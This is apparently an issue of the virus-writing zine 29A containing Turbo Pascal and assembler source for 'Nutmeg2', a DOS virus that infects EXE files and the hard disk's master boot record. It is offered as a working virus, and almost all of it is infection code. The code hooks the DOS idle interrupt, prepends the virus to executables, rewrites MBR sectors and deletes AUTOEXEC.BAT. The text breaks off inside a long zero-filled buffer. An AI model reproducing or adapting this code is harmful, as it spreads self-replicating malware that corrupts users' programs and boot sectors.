Copy Link
Add to Bookmark
Report
29A Issue 03 06 13
{
[Nutmeg2] Turbo Pascal Multipartite EXE/MBR infector
Copyright 1998 (c) Vecna
This is the first know virus written in HLL that infect the MBR also. It
infect the owner of the envirment in each interupt 0x28 call, that is called
when DOS is idle. The virus place itself in the start of the infected file,
adding 4096 bytes to it. It is a prepender that reexecute the host, but with
the original name, so, if the host program goes memory resident, MEM.EXE dont
show a foreign program as resident. It also have the so called "host stealth",
infecting all files, including these with self-checks. Two external assembler
routines are used to give the virus the multipartite ability. The virus is
packed with LZEXE, and replicate in this form.
Two big ugly buffers are used as a temporary storage area when copying and
working in the MBR. As the file is packed, altought using big memory spaces,
they dont increase the file lenght.
}
{$F+}
{$S-}
{$M 8192,0,0}
PROGRAM NUTMEG;
USES DOS;
CONST VIRSIZE=4096;
TYPE BUFFER=ARRAY[0..VIRSIZE - 1] OF CHAR;
VAR HANDLE:WORD;
ENVSEG:WORD;
ENVOFF:WORD;
PSPSEG:WORD;
FILENAME:STRING[128];
MYNAME:STRING[128];
OLDNAME:STRING[128];
MYPARAMS:STRING[128];
VIRBUFFER:BUFFER;
AEXEC:BOOLEAN;
PROCEDURE GETSEGMENTS; ASSEMBLER;
ASM
MOV AH, 51H
INT 21H
MOV ES, BX
MOV ES, ES:[2CH]
MOV ENVSEG, ES
MOV PSPSEG, BX
END;
PROCEDURE FSEEK(POINTER:WORD); ASSEMBLER;
ASM
MOV AX, 4200H
MOV BX, HANDLE
XOR CX, CX
MOV DX, POINTER
INT 21H
END;
PROCEDURE READFILE(VAR FILEBUF:BUFFER; READNUM:WORD); ASSEMBLER;
ASM
PUSH DS
MOV AH, 3FH
MOV BX, HANDLE
MOV CX, READNUM
LDS DX, FILEBUF
INT 21H
POP DS
END;
PROCEDURE WRITEFILE(FILEBUF:BUFFER; WRITENUM:WORD); ASSEMBLER;
ASM
PUSH DS
MOV AH, 40H
MOV BX, HANDLE
MOV CX, WRITENUM
LDS DX, FILEBUF
INT 21H
POP DS
END;
PROCEDURE OPENFILE(FILENAME:STRING; ACCESS:BYTE); ASSEMBLER;
ASM
PUSH DS
MOV AH, 3DH
MOV AL, ACCESS
LDS DX, FILENAME
INC DX
INT 21H
MOV HANDLE, AX
POP DS
END;
PROCEDURE ERASEFILE(FILENAME:STRING); ASSEMBLER;
ASM
PUSH DS
MOV AH, 41H
LDS DX, FILENAME
INC DX
INT 21H
POP DS
END;
PROCEDURE CLOSEFILE; ASSEMBLER;
ASM
MOV AH, 3EH
MOV BX, HANDLE
INT 21H
END;
PROCEDURE CREATENEWFILE(FILENAME:STRING; ATTRIBUTES:WORD); ASSEMBLER;
ASM
PUSH DS
MOV AH, 3CH
MOV CX, ATTRIBUTES
LDS DX, FILENAME
INC DX
INT 21H
MOV HANDLE, AX
POP DS
END;
PROCEDURE RENAMEFILE(SOURCE:STRING;DESTINATION:STRING); ASSEMBLER;
ASM
PUSH DS
MOV AH, 56H
LDS DX, SOURCE
INC DX
LES DI, DESTINATION
INC DI
INT 21H
POP DS
END;
PROCEDURE COPYTO(DESTINATION:STRING; SOURCE:STRING; STARTAT:WORD); ASSEMBLER;
VAR HANDLE1,HANDLE2:WORD;
ASM
PUSH DS
MOV AX,3D00H
LDS DX,SOURCE
INC DX
INT 21H
MOV HANDLE1, AX
MOV AX,3D02H
LDS DX,DESTINATION
INC DX
INT 21H
MOV HANDLE2, AX
MOV AX, 4200H
MOV BX, HANDLE1
XOR CX, CX
MOV DX, STARTAT
INT 21H
MOV AX, 4202H
MOV BX, HANDLE2
XOR CX, CX
CWD
INT 21H
PUSH CS
POP DS
MOV DX, OFFSET @BUFFER
@NEXTCHUNK:
MOV AH, 3FH
MOV BX, HANDLE1
MOV CX, 16*64*4
INT 21H
MOV CX, AX
MOV AH, 40H
MOV BX, HANDLE2
INT 21H
CMP AX, 16*64*4
JE @NEXTCHUNK
MOV AH, 3EH
MOV BX, HANDLE1
INT 21H
MOV AH, 3EH
MOV BX, HANDLE2
INT 21H
JMP @EXIT
@BUFFER:
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
DB 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
@EXIT:
POP DS
END;
FUNCTION RANDOMNAME: STRING;
FUNCTION POELETRA(QTAS:CHAR): STRING;
VAR CH:CHAR;
TEMP:STRING[12];
BEGIN
TEMP:='';
REPEAT
CH:=CHR(65+RANDOM(25));
TEMP:=TEMP+CH;
UNTIL TEMP[0]=QTAS;
POELETRA:=TEMP;
END;
BEGIN
RANDOMNAME:=POELETRA(#8)+'.'+POELETRA(#3)+#0;
END;
PROCEDURE PSPOWNER;
BEGIN
ENVOFF:=0;
FILENAME:='';
GETSEGMENTS;
REPEAT
ENVOFF:=ENVOFF+1;
UNTIL MEMW[ENVSEG:ENVOFF]=$00;
ENVOFF:=ENVOFF+4;
REPEAT
FILENAME:=FILENAME+CHR(MEM[ENVSEG:ENVOFF]);
ENVOFF:=ENVOFF+1;
UNTIL MEM[ENVSEG:ENVOFF-1]=$00;
END;
PROCEDURE VIRUSINT28; INTERRUPT;
PROCEDURE INFECTEXE;
VAR NEWNAME:STRING[128];
WHERESLASH:WORD;
OK:BYTE;
BEGIN
OK:=0;
ASM
PUSH DS
MOV AX, SEG FILENAME
MOV DS, AX
MOV SI, OFFSET FILENAME
MOV DX, SI
INC DX
MOV AX, 4300H
INT 21H
JC @TERMINATED
CMP CX, 1
JE @TERMINATED
XOR CX, CX
@SEARCHSLASH:
INC SI
INC CX
CMP BYTE PTR DS:[SI], 0
JE @TERMINATED
CMP BYTE PTR DS:[SI], '\'
JNE @SEARCHSLASH
MOV WHERESLASH, CX
MOV OK, 1
JMP @SEARCHSLASH
@TERMINATED:
POP DS
END;
IF OK=1 THEN BEGIN
NEWNAME:=COPY(FILENAME,1,WHERESLASH)+RANDOMNAME;
RENAMEFILE(FILENAME,NEWNAME);
CREATENEWFILE(FILENAME,0);
WRITEFILE(VIRBUFFER,VIRSIZE);
CLOSEFILE;
COPYTO(FILENAME,NEWNAME,0);
ERASEFILE(NEWNAME);
END;
ASM
PUSH DS
MOV AX, SEG FILENAME
MOV DS, AX
MOV DX, OFFSET FILENAME
INC DX
MOV AX, 4301H
MOV CX, 1
INT 21H
POP DS
END;
END;
BEGIN
PSPOWNER;
IF NOT(OLDNAME=FILENAME) THEN BEGIN
IF (FILENAME[LENGTH(FILENAME)-1]='E') THEN INFECTEXE;
OLDNAME:=FILENAME;
END;
END;
PROCEDURE INITALL;
VAR COUNT:BYTE;
BEGIN
AEXEC:=TRUE;
RANDOMIZE;
PSPOWNER;
MYNAME:=FILENAME;
OPENFILE(MYNAME,0);
READFILE(VIRBUFFER,VIRSIZE);
CLOSEFILE;
IF PARAMSTR(1)='!' THEN BEGIN
ASM
PUSH DS
PUSH CS
POP DS
CALL @GETNAME
DB 'AUTOEXEC.BAT', 0
@GETNAME:
POP DX
MOV AX, 3D02H
INT 21H
JC @ECA
XCHG AX, BX
MOV AX, 4202H
MOV CX, -1
MOV DX, -19
INT 21H
MOV AH, 40H
XOR CX, CX
INT 21H
MOV AH, 3EH
INT 21H
MOV AX, SEG MYNAME
MOV DS, AX
MOV DX, OFFSET MYNAME
INC DX
MOV AX, 4301H
XOR CX, CX
INT 21H
JC @ECA
MOV AH, 41H
INT 21H
@ECA:
POP DS
END;
AEXEC:=FALSE;
END;
FOR COUNT:=1 TO PARAMCOUNT DO MYPARAMS:=MYPARAMS+PARAMSTR(COUNT)+' ';
END;
PROCEDURE SPAWNHOST;
VAR NEWNAME:STRING[128];
INF, OUTF:FILE;
ATTR:WORD;
BEGIN
IF AEXEC=TRUE THEN BEGIN
ASM
PUSH DS
MOV AX, SEG MYNAME
MOV DS, AX
MOV DX, OFFSET MYNAME
INC DX
MOV AX, 4300H
INT 21H
MOV ATTR, CX
MOV AX, 4301H
XOR CX, CX
INT 21H
POP DS
END;
NEWNAME:=RANDOMNAME;
RENAMEFILE(MYNAME,NEWNAME);
CREATENEWFILE(MYNAME,2);
CLOSEFILE;
COPYTO(MYNAME,NEWNAME,VIRSIZE);
SWAPVECTORS;
EXEC(MYNAME, MYPARAMS);
SWAPVECTORS;
ERASEFILE(MYNAME);
RENAMEFILE(NEWNAME,MYNAME);
ASM
PUSH DS
MOV AX, SEG MYNAME
MOV DS, AX
MOV DX, OFFSET MYNAME
INC DX
MOV AX, 4301H
MOV CX, ATTR
INT 21H
MOV AX, SEG NEWNAME
MOV DS, AX
MOV DX, OFFSET NEWNAME
INC DX
MOV AX, 4301H
XOR CX, CX
INT 21H
MOV AH, 41H
INT 21H
POP DS
END;
END;
END;
FUNCTION RESIDENT:BOOLEAN;
VAR IVT:LONGINT;
BEGIN
IVT:=MEML[$0:$350];
IF IVT=$20FF20FF THEN RESIDENT:=TRUE ELSE RESIDENT:=FALSE;
END;
PROCEDURE MLOADER; EXTERNAL;
{$L MLOADER.OBJ}
PROCEDURE LOADER; EXTERNAL;
{$L LOADER.OBJ}
PROCEDURE INFECTMBR;
BEGIN
ASM
PUSH DS
PUSH CS
POP ES
PUSH CS
POP DS
MOV AH, 08H
MOV DX, 0080H
INT 13H
AND CX, 00111111B
CMP CL, ((VIRSIZE+511)/512)+6
JB @OVERBUFFER
MOV AX, 0201H
MOV CX, 0001H
MOV BX, OFFSET @BUFFER
MOV DX, 0080H
INT 13H
JC @OVERBUFFER
MOV DI, BX
MOV SI, OFFSET MLOADER
MOV AX, WORD PTR [SI]
CMP WORD PTR [DI], AX
JE @OVERBUFFER
MOV AX, 0301H
MOV CX, 0002H
INT 13H
JC @OVERBUFFER
MOV CX, OFFSET LOADER
SUB CX, OFFSET MLOADER
CLD
REP MOVSB
MOV AX, 0301H
MOV CX, 0001H
MOV DX, 0080H
INT 13H
JC @OVERBUFFER
MOV AX, 0302H
MOV CX, 0003H
MOV BX, OFFSET LOADER
MOV DX, 0080H
INT 13H
JC @OVERBUFFER
MOV BX, OFFSET VIRBUFFER
MOV AX, SEG VIRBUFFER
MOV ES, AX
MOV AX, 300H+((VIRSIZE+511)/512)
MOV CX, 0005H
INT 13H
JMP @OVERBUFFER
@BUFFER:
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
DB 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
